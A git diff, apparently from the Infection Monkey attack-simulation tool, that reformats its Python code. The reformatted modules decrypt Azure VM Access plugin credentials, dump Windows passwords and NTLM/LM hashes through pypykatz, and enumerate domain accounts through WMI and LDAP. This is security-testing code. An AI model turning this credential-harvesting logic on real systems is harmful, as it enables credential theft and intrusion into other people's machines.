b64_proc.communicate(input=protected_data + "\n")[0] - decrypt_command = 'openssl smime -inform DER -decrypt -inkey %s' % priv_path - decrypt_proc = subprocess.Popen(decrypt_command.split(), stdout=subprocess.PIPE, stdin=subprocess.PIPE) + decrypt_command = "openssl smime -inform DER -decrypt -inkey %s" % priv_path + decrypt_proc = subprocess.Popen( + decrypt_command.split(), stdout=subprocess.PIPE, stdin=subprocess.PIPE + ) decrypt_raw = decrypt_proc.communicate(input=b64_result)[0] decrypt_data = json.loads(decrypt_raw) - T1005Telem(ScanStatus.USED, 'Azure credentials', "Path: %s" % filepath).send() - T1064Telem(ScanStatus.USED, 'Bash scripts used to extract azure credentials.').send() - return decrypt_data['username'], decrypt_data['password'] + T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send() + T1064Telem(ScanStatus.USED, "Bash scripts used to extract azure credentials.").send() + return decrypt_data["username"], decrypt_data["password"] except IOError: LOG.warning("Failed to parse VM Access plugin file. Could not open file") return None @@ -68,7 +76,9 @@ class AzureCollector(object): LOG.warning("Failed to parse VM Access plugin file. Invalid format") return None except subprocess.CalledProcessError: - LOG.warning("Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data") + LOG.warning( + "Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data" + ) return None @staticmethod @@ -78,28 +88,36 @@ class AzureCollector(object): :return: Username,password """ try: - json_data = json.load(open(filepath, 'r')) + json_data = json.load(open(filepath, "r")) # this is liable to change but seems to be stable over the last year - protected_data = json_data['runtimeSettings'][0]['handlerSettings']['protectedSettings'] - username = json_data['runtimeSettings'][0]['handlerSettings']['publicSettings']['UserName'] + protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"] + username = json_data["runtimeSettings"][0]["handlerSettings"]["publicSettings"][ + "UserName" + ] # we're going to do as much of this in PS as we can. - ps_block = ";\n".join([ - '[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null', - '$base64 = "%s"' % protected_data, - "$content = [Convert]::FromBase64String($base64)", - "$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms", - "$env.Decode($content)", - "$env.Decrypt()", - "$utf8content = [text.encoding]::UTF8.getstring($env.ContentInfo.Content)", - "Write-Host $utf8content" # we want to simplify parsing - ]) - ps_proc = subprocess.Popen(["powershell.exe", "-NoLogo"], stdin=subprocess.PIPE, stdout=subprocess.PIPE) + ps_block = ";\n".join( + [ + '[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null', + '$base64 = "%s"' % protected_data, + "$content = [Convert]::FromBase64String($base64)", + "$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms", + "$env.Decode($content)", + "$env.Decrypt()", + "$utf8content = [text.encoding]::UTF8.getstring($env.ContentInfo.Content)", + "Write-Host $utf8content", # we want to simplify parsing + ] + ) + ps_proc = subprocess.Popen( + ["powershell.exe", "-NoLogo"], stdin=subprocess.PIPE, stdout=subprocess.PIPE + ) ps_out = ps_proc.communicate(ps_block)[0] # this is disgusting but the alternative is writing the file to disk... - password_raw = ps_out.split('\n')[-2].split(">")[1].split("$utf8content")[1] + password_raw = ps_out.split("\n")[-2].split(">")[1].split("$utf8content")[1] password = json.loads(password_raw)["Password"] - T1005Telem(ScanStatus.USED, 'Azure credentials', "Path: %s" % filepath).send() - T1064Telem(ScanStatus.USED, 'Powershell scripts used to extract azure credentials.').send() + T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send() + T1064Telem( + ScanStatus.USED, "Powershell scripts used to extract azure credentials." + ).send() return username, password except IOError: LOG.warning("Failed to parse VM Access plugin file. Could not open file") @@ -108,5 +126,7 @@ class AzureCollector(object): LOG.warning("Failed to parse VM Access plugin file. Invalid format") return None except subprocess.CalledProcessError: - LOG.warning("Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data") + LOG.warning( + "Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data" + ) return None diff --git a/monkey/infection_monkey/system_info/collectors/aws_collector.py b/monkey/infection_monkey/system_info/collectors/aws_collector.py index 94a7baf2a..074d19cc1 100644 --- a/monkey/infection_monkey/system_info/collectors/aws_collector.py +++ b/monkey/infection_monkey/system_info/collectors/aws_collector.py @@ -4,7 +4,9 @@ from common.cloud.aws.aws_instance import AwsInstance from common.cloud.scoutsuite_consts import CloudProviders from common.common_consts.system_info_collectors_names import AWS_COLLECTOR from infection_monkey.network.tools import is_running_on_island -from infection_monkey.system_info.collectors.scoutsuite_collector.scoutsuite_collector import scan_cloud_security +from infection_monkey.system_info.collectors.scoutsuite_collector.scoutsuite_collector import ( + scan_cloud_security, +) from infection_monkey.system_info.system_info_collector import SystemInfoCollector logger = logging.getLogger(__name__) @@ -14,6 +16,7 @@ class AwsCollector(SystemInfoCollector): """ Extract info from AWS machines. """ + def __init__(self): super().__init__(name=AWS_COLLECTOR) @@ -28,10 +31,7 @@ class AwsCollector(SystemInfoCollector): info = {} if aws.is_instance(): logger.info("Machine is an AWS instance") - info = \ - { - 'instance_id': aws.get_instance_id() - } + info = {"instance_id": aws.get_instance_id()} else: logger.info("Machine is NOT an AWS instance") diff --git a/monkey/infection_monkey/system_info/collectors/process_list_collector.py b/monkey/infection_monkey/system_info/collectors/process_list_collector.py index cdb5bc045..a95ac385b 100644 --- a/monkey/infection_monkey/system_info/collectors/process_list_collector.py +++ b/monkey/infection_monkey/system_info/collectors/process_list_collector.py @@ -48,4 +48,4 @@ class ProcessListCollector(SystemInfoCollector): } continue - return {'process_list': processes} + return {"process_list": processes} diff --git a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py index 79aabea56..ec8a5e488 100644 --- a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py +++ b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py @@ -15,18 +15,20 @@ logger = logging.getLogger(__name__) def scan_cloud_security(cloud_type: CloudProviders): try: results = run_scoutsuite(cloud_type.value) - if isinstance(results, dict) and 'error' in results and results['error']: - raise ScoutSuiteScanError(results['error']) + if isinstance(results, dict) and "error" in results and results["error"]: + raise ScoutSuiteScanError(results["error"]) send_scoutsuite_run_results(results) except (Exception, ScoutSuiteScanError) as e: logger.error(f"ScoutSuite didn't scan {cloud_type.value} security because: {e}") def run_scoutsuite(cloud_type: str) -> Union[BaseProvider, dict]: - return ScoutSuite.api_run.run(provider=cloud_type, - aws_access_key_id=WormConfiguration.aws_access_key_id, - aws_secret_access_key=WormConfiguration.aws_secret_access_key, - aws_session_token=WormConfiguration.aws_session_token) + return ScoutSuite.api_run.run( + provider=cloud_type, + aws_access_key_id=WormConfiguration.aws_access_key_id, + aws_secret_access_key=WormConfiguration.aws_secret_access_key, + aws_session_token=WormConfiguration.aws_session_token, + ) def send_scoutsuite_run_results(run_results: BaseProvider): diff --git a/monkey/infection_monkey/system_info/linux_info_collector.py b/monkey/infection_monkey/system_info/linux_info_collector.py index fb38f84c4..672f1c8a9 100644 --- a/monkey/infection_monkey/system_info/linux_info_collector.py +++ b/monkey/infection_monkey/system_info/linux_info_collector.py @@ -3,7 +3,7 @@ import logging from infection_monkey.system_info import InfoCollector from infection_monkey.system_info.SSH_info_collector import SSHCollector -__author__ = 'uri' +__author__ = "uri" LOG = logging.getLogger(__name__) @@ -24,5 +24,5 @@ class LinuxInfoCollector(InfoCollector): """ LOG.debug("Running Linux collector") super(LinuxInfoCollector, self).get_info() - self.info['ssh_info'] = SSHCollector.get_info() + self.info["ssh_info"] = SSHCollector.get_info() return self.info diff --git a/monkey/infection_monkey/system_info/netstat_collector.py b/monkey/infection_monkey/system_info/netstat_collector.py index bd35f3126..d35b4c1fb 100644 --- a/monkey/infection_monkey/system_info/netstat_collector.py +++ b/monkey/infection_monkey/system_info/netstat_collector.py @@ -6,7 +6,7 @@ from socket import AF_INET, SOCK_DGRAM, SOCK_STREAM import psutil -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" LOG = logging.getLogger(__name__) @@ -16,29 +16,28 @@ class NetstatCollector(object): Extract netstat info """ - AF_INET6 = getattr(socket, 'AF_INET6', object()) + AF_INET6 = getattr(socket, "AF_INET6", object()) proto_map = { - (AF_INET, SOCK_STREAM): 'tcp', - (AF_INET6, SOCK_STREAM): 'tcp6', - (AF_INET, SOCK_DGRAM): 'udp', - (AF_INET6, SOCK_DGRAM): 'udp6', + (AF_INET, SOCK_STREAM): "tcp", + (AF_INET6, SOCK_STREAM): "tcp6", + (AF_INET, SOCK_DGRAM): "udp", + (AF_INET6, SOCK_DGRAM): "udp6", } @staticmethod def get_netstat_info(): LOG.info("Collecting netstat info") - return [NetstatCollector._parse_connection(c) for c in psutil.net_connections(kind='inet')] + return [NetstatCollector._parse_connection(c) for c in psutil.net_connections(kind="inet")] @staticmethod def _parse_connection(c): - return \ - { - 'proto': NetstatCollector.proto_map[(c.family, c.type)], - 'local_address': c.laddr[0], - 'local_port': c.laddr[1], - 'remote_address': c.raddr[0] if c.raddr else None, - 'remote_port': c.raddr[1] if c.raddr else None, - 'status': c.status, - 'pid': c.pid - } + return { + "proto": NetstatCollector.proto_map[(c.family, c.type)], + "local_address": c.laddr[0], + "local_port": c.laddr[1], + "remote_address": c.raddr[0] if c.raddr else None, + "remote_port": c.raddr[1] if c.raddr else None, + "status": c.status, + "pid": c.pid, + } diff --git a/monkey/infection_monkey/system_info/system_info_collector.py b/monkey/infection_monkey/system_info/system_info_collector.py index ee4bb21e8..ac269f5b0 100644 --- a/monkey/infection_monkey/system_info/system_info_collector.py +++ b/monkey/infection_monkey/system_info/system_info_collector.py @@ -14,6 +14,7 @@ class SystemInfoCollector(Plugin, metaclass=ABCMeta): See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide. """ + def __init__(self, name="unknown"): self.name = name diff --git a/monkey/infection_monkey/system_info/system_info_collectors_handler.py b/monkey/infection_monkey/system_info/system_info_collectors_handler.py index cc007ff86..9c883084c 100644 --- a/monkey/infection_monkey/system_info/system_info_collectors_handler.py +++ b/monkey/infection_monkey/system_info/system_info_collectors_handler.py @@ -23,8 +23,11 @@ class SystemInfoCollectorsHandler(object): except Exception as e: # If we failed one collector, no need to stop execution. Log and continue. LOG.error("Collector {} failed. Error info: {}".format(collector.name, e)) - LOG.info("All system info collectors executed. Total {} executed, out of which {} collected successfully.". - format(len(self.collectors_list), successful_collections)) + LOG.info( + "All system info collectors executed. Total {} executed, out of which {} collected successfully.".format( + len(self.collectors_list), successful_collections + ) + ) SystemInfoTelem({"collectors": system_info_telemetry}).send() diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py index 96d3912e3..0bed5c7f8 100644 --- a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py +++ b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py @@ -2,13 +2,14 @@ import logging from typing import List from infection_monkey.system_info.windows_cred_collector import pypykatz_handler -from infection_monkey.system_info.windows_cred_collector.windows_credentials import WindowsCredentials +from infection_monkey.system_info.windows_cred_collector.windows_credentials import ( + WindowsCredentials, +) LOG = logging.getLogger(__name__) class MimikatzCredentialCollector(object): - @staticmethod def get_creds(): creds = pypykatz_handler.get_windows_creds() diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py index ca146573f..23bcce771 100644 --- a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py +++ b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py @@ -3,11 +3,21 @@ from typing import Any, Dict, List, NewType from pypykatz.pypykatz import pypykatz -from infection_monkey.system_info.windows_cred_collector.windows_credentials import WindowsCredentials +from infection_monkey.system_info.windows_cred_collector.windows_credentials import ( + WindowsCredentials, +) -CREDENTIAL_TYPES = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'dpapi_creds', - 'kerberos_creds', 'credman_creds', 'tspkg_creds'] -PypykatzCredential = NewType('PypykatzCredential', Dict) +CREDENTIAL_TYPES = [ + "msv_creds", + "wdigest_creds", + "ssp_creds", + "livessp_creds", + "dpapi_creds", + "kerberos_creds", + "credman_creds", + "tspkg_creds", +] +PypykatzCredential = NewType("PypykatzCredential", Dict) def get_windows_creds() -> List[WindowsCredentials]: @@ -19,7 +29,7 @@ def get_windows_creds() -> List[WindowsCredentials]: def _parse_pypykatz_results(pypykatz_data: Dict) -> List[WindowsCredentials]: windows_creds = [] - for session in pypykatz_data['logon_sessions'].values(): + for session in pypykatz_data["logon_sessions"].values(): windows_creds.extend(_get_creds_from_pypykatz_session(session)) return windows_creds @@ -32,7 +42,9 @@ def _get_creds_from_pypykatz_session(pypykatz_session: Dict) -> List[WindowsCred return windows_creds -def _get_creds_from_pypykatz_creds(pypykatz_creds: List[PypykatzCredential]) -> List[WindowsCredentials]: +def _get_creds_from_pypykatz_creds( + pypykatz_creds: List[PypykatzCredential], +) -> List[WindowsCredentials]: creds = _filter_empty_creds(pypykatz_creds) return [_get_windows_cred(cred) for cred in creds] @@ -42,27 +54,26 @@ def _filter_empty_creds(pypykatz_creds: List[PypykatzCredential]) -> List[Pypyka def _is_cred_empty(pypykatz_cred: PypykatzCredential): - password_empty = 'password' not in pypykatz_cred or not pypykatz_cred['password'] - ntlm_hash_empty = 'NThash' not in pypykatz_cred or not pypykatz_cred['NThash'] - lm_hash_empty = 'LMhash' not in pypykatz_cred or not pypykatz_cred['LMhash'] + password_empty = "password" not in pypykatz_cred or not pypykatz_cred["password"] + ntlm_hash_empty = "NThash" not in pypykatz_cred or not pypykatz_cred["NThash"] + lm_hash_empty = "LMhash" not in pypykatz_cred or not pypykatz_cred["LMhash"] return password_empty and ntlm_hash_empty and lm_hash_empty def _get_windows_cred(pypykatz_cred: PypykatzCredential): - password = '' - ntlm_hash = '' - lm_hash = '' - username = pypykatz_cred['username'] - if 'password' in pypykatz_cred: - password = pypykatz_cred['password'] - if 'NThash' in pypykatz_cred: - ntlm_hash = _hash_to_string(pypykatz_cred['NThash']) - if 'LMhash' in pypykatz_cred: - lm_hash = _hash_to_string(pypykatz_cred['LMhash']) - return WindowsCredentials(username=username, - password=password, - ntlm_hash=ntlm_hash, - lm_hash=lm_hash) + password = "" + ntlm_hash = "" + lm_hash = "" + username = pypykatz_cred["username"] + if "password" in pypykatz_cred: + password = pypykatz_cred["password"] + if "NThash" in pypykatz_cred: + ntlm_hash = _hash_to_string(pypykatz_cred["NThash"]) + if "LMhash" in pypykatz_cred: + lm_hash = _hash_to_string(pypykatz_cred["LMhash"]) + return WindowsCredentials( + username=username, password=password, ntlm_hash=ntlm_hash, lm_hash=lm_hash + ) def _hash_to_string(hash_: Any): diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py index 165b00cf2..f2d9565b1 100644 --- a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py +++ b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py @@ -1,87 +1,154 @@ from unittest import TestCase -from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import _get_creds_from_pypykatz_session +from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import ( + _get_creds_from_pypykatz_session, +) class TestPypykatzHandler(TestCase): # Made up credentials, but structure of dict should be roughly the same PYPYKATZ_SESSION = { - 'authentication_id': 555555, 'session_id': 3, 'username': 'Monkey', - 'domainname': 'ReAlDoMaIn', 'logon_server': 'ReAlDoMaIn', - 'logon_time': '2020-06-02T04:53:45.256562+00:00', - 'sid': 'S-1-6-25-260123139-3611579848-5589493929-3021', 'luid': 123086, - 'msv_creds': [ - {'username': 'monkey', 'domainname': 'ReAlDoMaIn', - 'NThash': b'1\xb7 Dict: - return {'username': self.username, - 'password': self.password, - 'ntlm_hash': self.ntlm_hash, - 'lm_hash': self.lm_hash} + return { + "username": self.username, + "password": self.password, + "ntlm_hash": self.ntlm_hash, + "lm_hash": self.lm_hash, + } diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 8a53898c7..f978a9942 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -3,7 +3,9 @@ import subprocess import sys from common.common_consts.system_info_collectors_names import MIMIKATZ_COLLECTOR -from infection_monkey.system_info.windows_cred_collector.mimikatz_cred_collector import MimikatzCredentialCollector +from infection_monkey.system_info.windows_cred_collector.mimikatz_cred_collector import ( + MimikatzCredentialCollector, +) sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import infection_monkey.config # noqa: E402 @@ -12,9 +14,9 @@ from infection_monkey.system_info import InfoCollector # noqa: E402 from infection_monkey.system_info.wmi_consts import WMI_CLASSES # noqa: E402 LOG = logging.getLogger(__name__) -LOG.info('started windows info collector') +LOG.info("started windows info collector") -__author__ = 'uri' +__author__ = "uri" class WindowsInfoCollector(InfoCollector): @@ -25,8 +27,8 @@ class WindowsInfoCollector(InfoCollector): def __init__(self): super(WindowsInfoCollector, self).__init__() self._config = infection_monkey.config.WormConfiguration - self.info['reg'] = {} - self.info['wmi'] = {} + self.info["reg"] = {} + self.info["wmi"] = {} def get_info(self): """ @@ -40,27 +42,28 @@ class WindowsInfoCollector(InfoCollector): # TODO: Think about returning self.get_wmi_info() self.get_installed_packages() from infection_monkey.config import WormConfiguration + if MIMIKATZ_COLLECTOR in WormConfiguration.system_info_collector_classes: self.get_mimikatz_info() return self.info def get_installed_packages(self): - LOG.info('Getting installed packages') + LOG.info("Getting installed packages") packages = subprocess.check_output("dism /online /get-packages", shell=True) - self.info["installed_packages"] = packages.decode('utf-8', errors='ignore') + self.info["installed_packages"] = packages.decode("utf-8", errors="ignore") features = subprocess.check_output("dism /online /get-features", shell=True) - self.info["installed_features"] = features.decode('utf-8', errors='ignore') + self.info["installed_features"] = features.decode("utf-8", errors="ignore") - LOG.debug('Got installed packages') + LOG.debug("Got installed packages") def get_wmi_info(self): - LOG.info('Getting wmi info') + LOG.info("Getting wmi info") for wmi_class_name in WMI_CLASSES: - self.info['wmi'][wmi_class_name] = WMIUtils.get_wmi_class(wmi_class_name) - LOG.debug('Finished get_wmi_info') + self.info["wmi"][wmi_class_name] = WMIUtils.get_wmi_class(wmi_class_name) + LOG.debug("Finished get_wmi_info") def get_mimikatz_info(self): LOG.info("Gathering mimikatz info") @@ -70,8 +73,8 @@ class WindowsInfoCollector(InfoCollector): if "credentials" in self.info: self.info["credentials"].update(credentials) self.info["mimikatz"] = credentials - LOG.info('Mimikatz info gathered successfully') + LOG.info("Mimikatz info gathered successfully") else: - LOG.info('No mimikatz info was gathered') + LOG.info("No mimikatz info was gathered") except Exception as e: LOG.info(f"Mimikatz credential collector failed: {e}") diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py index a42472b82..71366a466 100644 --- a/monkey/infection_monkey/system_info/wmi_consts.py +++ b/monkey/infection_monkey/system_info/wmi_consts.py @@ -1,31 +1,82 @@ -WMI_CLASSES = {"Win32_OperatingSystem", "Win32_ComputerSystem", "Win32_LoggedOnUser", "Win32_UserAccount", - "Win32_UserProfile", "Win32_Group", "Win32_GroupUser", "Win32_Product", "Win32_Service", - "Win32_OptionalFeature"} +WMI_CLASSES = { + "Win32_OperatingSystem", + "Win32_ComputerSystem", + "Win32_LoggedOnUser", + "Win32_UserAccount", + "Win32_UserProfile", + "Win32_Group", + "Win32_GroupUser", + "Win32_Product", + "Win32_Service", + "Win32_OptionalFeature", +} # These wmi queries are able to return data about all the users & machines in the domain. # For these queries to work, the monkey should be run on a domain machine and # # monkey should run as *** SYSTEM *** !!! # -WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName", - "DS_sAMAccountType", "ADSIPath", "DS_userAccountControl", - "DS_objectSid", "DS_objectClass", "DS_memberOf", - "DS_primaryGroupID", "DS_pwdLastSet", "DS_badPasswordTime", - "DS_badPwdCount", "DS_lastLogon", "DS_lastLogonTimestamp", - "DS_lastLogoff", "DS_logonCount", "DS_accountExpires"), - - "ds_group": ("DS_whenChanged", "DS_whenCreated", "DS_sAMAccountName", - "DS_sAMAccountType", "DS_objectSid", "DS_objectClass", - "DS_name", "DS_memberOf", "DS_member", "DS_instanceType", - "DS_cn", "DS_description", "DS_distinguishedName", "ADSIPath"), - - "ds_computer": ("DS_dNSHostName", "ADSIPath", "DS_accountExpires", - "DS_adminDisplayName", "DS_badPasswordTime", - "DS_badPwdCount", "DS_cn", "DS_distinguishedName", - "DS_instanceType", "DS_lastLogoff", "DS_lastLogon", - "DS_lastLogonTimestamp", "DS_logonCount", "DS_objectClass", - "DS_objectSid", "DS_operatingSystem", "DS_operatingSystemVersion", - "DS_primaryGroupID", "DS_pwdLastSet", "DS_sAMAccountName", - "DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl", - "DS_whenChanged", "DS_whenCreated"), - } +WMI_LDAP_CLASSES = { + "ds_user": ( + "DS_sAMAccountName", + "DS_userPrincipalName", + "DS_sAMAccountType", + "ADSIPath", + "DS_userAccountControl", + "DS_objectSid", + "DS_objectClass", + "DS_memberOf", + "DS_primaryGroupID", + "DS_pwdLastSet", + "DS_badPasswordTime", + "DS_badPwdCount", + "DS_lastLogon", + "DS_lastLogonTimestamp", + "DS_lastLogoff", + "DS_logonCount", + "DS_accountExpires", + ), + "ds_group": ( + "DS_whenChanged", + "DS_whenCreated", + "DS_sAMAccountName", + "DS_sAMAccountType", + "DS_objectSid", + "DS_objectClass", + "DS_name", + "DS_memberOf", + "DS_member", + "DS_instanceType", + "DS_cn", + "DS_description", + "DS_distinguishedName", + "ADSIPath", + ), + "ds_computer": ( + "DS_dNSHostName", + "ADSIPath", + "DS_accountExpires", + "DS_adminDisplayName", + "DS_badPasswordTime", + "DS_badPwdCount", + "DS_cn", + "DS_distinguishedName", + "DS_instanceType", + "DS_lastLogoff", + "DS_lastLogon", + "DS_lastLogonTimestamp", + "DS_logonCount", + "DS_objectClass", + "DS_objectSid", + "DS_operatingSystem", + "DS_operatingSystemVersion", + "DS_primaryGroupID", + "DS_pwdLastSet", + "DS_sAMAccountName", + "DS_sAMAccountType", + "DS_servicePrincipalName", + "DS_userAccountControl", + "DS_whenChanged", + "DS_whenCreated", + ), +} diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index f82e7be44..9576ff9f7 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -5,7 +5,7 @@ from abc import ABCMeta, abstractmethod from infection_monkey.config import WormConfiguration -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -37,23 +37,22 @@ class WindowsSystemSingleton(_SystemSingleton): def try_lock(self): assert self._mutex_handle is None, "Singleton already locked" - handle = ctypes.windll.kernel32.CreateMutexA(None, - ctypes.c_bool(True), - ctypes.c_char_p(self._mutex_name.encode())) + handle = ctypes.windll.kernel32.CreateMutexA( + None, ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name.encode()) + ) last_error = ctypes.windll.kernel32.GetLastError() if not handle: - LOG.error("Cannot acquire system singleton %r, unknown error %d", - self._mutex_name, last_error) + LOG.error( + "Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error + ) return False if winerror.ERROR_ALREADY_EXISTS == last_error: - LOG.debug("Cannot acquire system singleton %r, mutex already exist", - self._mutex_name) + LOG.debug("Cannot acquire system singleton %r, mutex already exist", self._mutex_name) return False self._mutex_handle = handle - LOG.debug("Global singleton mutex %r acquired", - self._mutex_name) + LOG.debug("Global singleton mutex %r acquired", self._mutex_name) return True @@ -78,10 +77,14 @@ class LinuxSystemSingleton(_SystemSingleton): sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: - sock.bind('\0' + self._unix_sock_name) + sock.bind("\0" + self._unix_sock_name) except socket.error as e: - LOG.error("Cannot acquire system singleton %r, error code %d, error: %s", - self._unix_sock_name, e.args[0], e.args[1]) + LOG.error( + "Cannot acquire system singleton %r, error code %d, error: %s", + self._unix_sock_name, + e.args[0], + e.args[1], + ) return False self._sock_handle = sock diff --git a/monkey/infection_monkey/telemetry/attack/attack_telem.py b/monkey/infection_monkey/telemetry/attack/attack_telem.py index ba3fae8fd..125906c74 100644 --- a/monkey/infection_monkey/telemetry/attack/attack_telem.py +++ b/monkey/infection_monkey/telemetry/attack/attack_telem.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class AttackTelem(BaseTelem): - def __init__(self, technique, status): """ Default ATT&CK telemetry constructor @@ -19,7 +18,4 @@ class AttackTelem(BaseTelem): telem_category = TelemCategoryEnum.ATTACK def get_data(self): - return { - 'status': self.status.value, - 'technique': self.technique - } + return {"status": self.status.value, "technique": self.technique} diff --git a/monkey/infection_monkey/telemetry/attack/t1005_telem.py b/monkey/infection_monkey/telemetry/attack/t1005_telem.py index 999d8622a..545bb47d3 100644 --- a/monkey/infection_monkey/telemetry/attack/t1005_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1005_telem.py @@ -9,14 +9,11 @@ class T1005Telem(AttackTelem): :param gathered_data_type: Type of data collected from local system :param info: Additional info about data """ - super(T1005Telem, self).__init__('T1005', status) + super(T1005Telem, self).__init__("T1005", status) self.gathered_data_type = gathered_data_type self.info = info def get_data(self): data = super(T1005Telem, self).get_data() - data.update({ - 'gathered_data_type': self.gathered_data_type, - 'info': self.info - }) + data.update({"gathered_data_type": self.gathered_data_type, "info": self.info}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1035_telem.py b/monkey/infection_monkey/telemetry/attack/t1035_telem.py index 4ca9dc93c..6a7867af2 100644 --- a/monkey/infection_monkey/telemetry/attack/t1035_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1035_telem.py @@ -8,4 +8,4 @@ class T1035Telem(UsageTelem): :param status: ScanStatus of technique :param usage: Enum of UsageEnum type """ - super(T1035Telem, self).__init__('T1035', status, usage) + super(T1035Telem, self).__init__("T1035", status, usage) diff --git a/monkey/infection_monkey/telemetry/attack/t1064_telem.py b/monkey/infection_monkey/telemetry/attack/t1064_telem.py index 94be44a79..f8cdf379c 100644 --- a/monkey/infection_monkey/telemetry/attack/t1064_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1064_telem.py @@ -9,12 +9,10 @@ class T1064Telem(AttackTelem): :param status: ScanStatus of technique :param usage: Usage string """ - super(T1064Telem, self).__init__('T1064', status) + super(T1064Telem, self).__init__("T1064", status) self.usage = usage def get_data(self): data = super(T1064Telem, self).get_data() - data.update({ - 'usage': self.usage - }) + data.update({"usage": self.usage}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1105_telem.py b/monkey/infection_monkey/telemetry/attack/t1105_telem.py index 454391da8..939e2b3e2 100644 --- a/monkey/infection_monkey/telemetry/attack/t1105_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1105_telem.py @@ -10,16 +10,12 @@ class T1105Telem(AttackTelem): :param dst: IP of machine which downloaded the file :param filename: Uploaded file's name """ - super(T1105Telem, self).__init__('T1105', status) + super(T1105Telem, self).__init__("T1105", status) self.filename = filename self.src = src self.dst = dst def get_data(self): data = super(T1105Telem, self).get_data() - data.update({ - 'filename': self.filename, - 'src': self.src, - 'dst': self.dst - }) + data.update({"filename": self.filename, "src": self.src, "dst": self.dst}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1107_telem.py b/monkey/infection_monkey/telemetry/attack/t1107_telem.py index ffb69b698..816488f3b 100644 --- a/monkey/infection_monkey/telemetry/attack/t1107_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1107_telem.py @@ -8,12 +8,10 @@ class T1107Telem(AttackTelem): :param status: ScanStatus of technique :param path: Path of deleted dir/file """ - super(T1107Telem, self).__init__('T1107', status) + super(T1107Telem, self).__init__("T1107", status) self.path = path def get_data(self): data = super(T1107Telem, self).get_data() - data.update({ - 'path': self.path - }) + data.update({"path": self.path}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1197_telem.py b/monkey/infection_monkey/telemetry/attack/t1197_telem.py index 769f93823..c5c98a9d0 100644 --- a/monkey/infection_monkey/telemetry/attack/t1197_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1197_telem.py @@ -12,12 +12,10 @@ class T1197Telem(VictimHostTelem): :param machine: VictimHost obj from model/host.py :param usage: Usage string """ - super(T1197Telem, self).__init__('T1197', status, machine) + super(T1197Telem, self).__init__("T1197", status, machine) self.usage = usage def get_data(self): data = super(T1197Telem, self).get_data() - data.update({ - 'usage': self.usage - }) + data.update({"usage": self.usage}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1222_telem.py b/monkey/infection_monkey/telemetry/attack/t1222_telem.py index 4708c230a..30a0314ae 100644 --- a/monkey/infection_monkey/telemetry/attack/t1222_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1222_telem.py @@ -9,12 +9,10 @@ class T1222Telem(VictimHostTelem): :param command: command used to change permissions :param machine: VictimHost type object """ - super(T1222Telem, self).__init__('T1222', status, machine) + super(T1222Telem, self).__init__("T1222", status, machine) self.command = command def get_data(self): data = super(T1222Telem, self).get_data() - data.update({ - 'command': self.command - }) + data.update({"command": self.command}) return data diff --git a/monkey/infection_monkey/telemetry/attack/usage_telem.py b/monkey/infection_monkey/telemetry/attack/usage_telem.py index 4b47d8be3..3066fe3d3 